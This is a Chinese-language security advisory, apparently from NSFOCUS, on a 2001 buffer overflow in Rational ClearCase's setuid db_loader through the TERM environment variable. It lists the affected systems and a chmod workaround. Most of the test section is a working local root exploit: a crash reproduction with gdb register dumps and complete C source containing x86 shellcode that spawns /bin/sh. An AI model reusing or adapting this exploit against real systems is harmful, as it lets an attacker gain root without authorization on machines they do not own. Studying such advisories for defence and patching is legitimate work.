首页 -> 安全研究
安全研究
安全漏洞
Rational ClearCase DB Loader TERM 环境变量缓冲区溢出漏洞
发布日期:2001-11-08
更新日期:2001-11-13
受影响系统:
描述:
Rational ClearCase 3.2
Rational ClearCase 4.0
Rational ClearCase 4.1
Rational ClearCase 4.2
- Caldera OpenUnix 8.0
- Caldera UnixWare 7
- Compaq Tru64 5.0
- Compaq Tru64 5.0a
- Compaq Tru64 5.0f
- Compaq Tru64 5.1
- Compaq Tru64 5.1a
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- IBM AIX 4.3
- IBM AIX 4.3.1
- IBM AIX 4.3.2
- IBM AIX 4.3.3
- IBM AIX 5.1
- RedHat Linux 6.2
- RedHat Linux 7.0
- RedHat Linux 7.1
- RedHat Linux 7.2
- SGI IRIX 6.5.11m
- SGI IRIX 6.5.12
- SGI IRIX 6.5.12f
- SGI IRIX 6.5.12m
- SGI IRIX 6.5.13
- SGI IRIX 6.5.13f
- SGI IRIX 6.5.13m
- Siemens Reliant UNIX 5.43
- Siemens Reliant UNIX 5.44
- Siemens Reliant UNIX 5.45
- Sun Solaris 2.6
- Sun Solaris 7.0
- Sun Solaris 8.0
BUGTRAQ ID: 3523
ClearCase 是一款软件变动管理软件包,由Rational维护和发布。该软件存在一个安全
问题,可能允许本地攻击者获取root权限。
由于db_loader 没有正确检查用户输入的TERM环境变量,攻击者通过精心构造一个特殊
的TERM环境变量,可能导致任意代码执行,攻击者就能因此而提升权限。
<*来源:xundi (xundi@xfocus.org)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/0046.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
xundi (xundi@xfocus.org)提供了如下测试代码:
$ TERM=`perl -e 'print "A"x550'`
$ export TERM
$ /usr/atria/etc/db_loader
Bus Error
$ gdb db_loader core -q
(no debugging symbols found)...Core was generated by `./db_loader'.
Cannot access memory at address 0xffffffffff3e1b80
#0 0xf0db8 in imsg_fputs ()
(gdb) bt
#0 0xf0db8 in imsg_fputs ()
Cannot access memory at address 0x41414179
(gdb) i reg
g0 0x0 0
g1 0x7b000 503808
g2 0x13cf84 1298308
g3 0x0 0
g4 0xf6c2c 1010732
g5 0x0 0
g6 0x0 0
g7 0x143d58 1326424
o0 0xffffffff -1
o1 0x1 1
o2 0xffbef054 -4263852
o3 0xf0c3c 986172
o4 0xffbeed8a -4264566
o5 0xffffffff -1
sp 0xffbeef70 -4264080
o7 0xf0db0 986544
l0 0x41414141 1094795585
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585
y 0x0 0
psr 0xfe801007 -25161721 icc:N---, pil:0, s:0, ps:0, et:0, cwp:7
wim 0x0 0
tbr 0x0 0
pc 0xf0db8 986552
npc 0xf0dbc 986556
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb)
-----------------------------
ClearCase_x86exp.c
/* Rational ClearCase TERM environment variable buffer overflow exploit
* test it again solaris x86 7, bug found by virtualcat@xfocus.org
* xploit by xundi@xfocus.org
* website: http://xfocus.org
*/
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#define RET_DIS 550
#define NOP 0x90
#define NNOP 512
#define ENV_VAR "TERM"
#define USER_UPPER_MAGIC 0x08047fff
/* Shell code taken from Pablo Sor's "mailx -F" exploit code */
char shellCode[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int get_esp()
{
__asm__("mov %esp,%eax");
}
int getEnvAddr(const char* envPtr)
{
int envAddr = NULL;
int retCode = 0;
char* charPtr = (char *) get_esp();
/* Search for the starting address of the environment string for */
/* the specified environment variable */
while((unsigned int) charPtr < (unsigned int) USER_UPPER_MAGIC)
{
retCode = memcmp((unsigned char *) charPtr++, envPtr, 4);
/* Found */
if(retCode == 0)
{
envAddr = (int) (charPtr - 1);
break;
}
}
return envAddr;
}
int main(int argc, char** argv)
{
char buff[256] = {0};
int* intPtr = NULL;
char* buffPtr = NULL;
char* charPtr = NULL;
int retAddr = 0;
int retValue = 0;
int buffLen = 0;
int adjustment = 0;
int strLen = 0;
int alignment = 0;
int diff = 0;
int i;
int shellCodeLen = strlen(shellCode);
if(argc == 2)
{
adjustment = atoi(argv[1]);
}
buffLen = strlen(ENV_VAR) + RET_DIS + NNOP + shellCodeLen + 1;
charPtr = getenv(ENV_VAR);
/* Adjust the stupid alignment */
strLen = strlen(charPtr) + 1;
alignment = strLen % 4;
if(alignment != 0)
{
alignment = 4 - alignment;
strLen += alignment;
}
alignment = buffLen % 4;
if(alignment != 0)
{
alignment = 4 - alignment;
buffLen += alignment;
}
retValue = getEnvAddr(ENV_VAR);
diff = buffLen - strLen;
retAddr = retValue - diff + strlen(ENV_VAR) + 1;
alignment = retAddr % 4;
if(alignment != 0)
{
alignment = 4 - alignment;
}
retAddr += RET_DIS + alignment + adjustment;
/* Allocate memory for the evil buffer */
buffPtr = (char *) malloc(buffLen);
if(buffPtr != NULL)
{
strcpy(buffPtr, ENV_VAR);
strcat(buffPtr, "=");
charPtr = (char *) (buffPtr + strlen(buffPtr));
/* Fill the rest of the buffer with 'A' */
memset(charPtr, 0x41, buffLen - strlen(buffPtr)-4);
/* Butt in the return address */
intPtr = (int *) (charPtr + RET_DIS);
*intPtr++ = retAddr;
/* Make sure the NOPs are located word aligned */
charPtr = (char *) intPtr;
charPtr += alignment;
for(i=0; i<NNOP; i++)
{
*charPtr++ = NOP;
}
for(i=0; i<shellCodeLen; i++)
{
*charPtr++ = shellCode[i];
}
*charPtr = 0;
putenv(buffPtr);
printf("Jumping to 0x%.8x\n", retAddr);
execl("/usr/atria/etc/db_loader", "xfocus", NULL);
}
else
{
printf("No more free memory!");
}
}
/*..Thanks for all xfocus members.. especially virtualcat*/
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时去掉“db_loader”的setuid位
# chmod a-s /usr/atria/etc/db_loader
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.rational.com/
浏览次数:4272
严重程度:0(网友投票)
绿盟科技给您安全的保障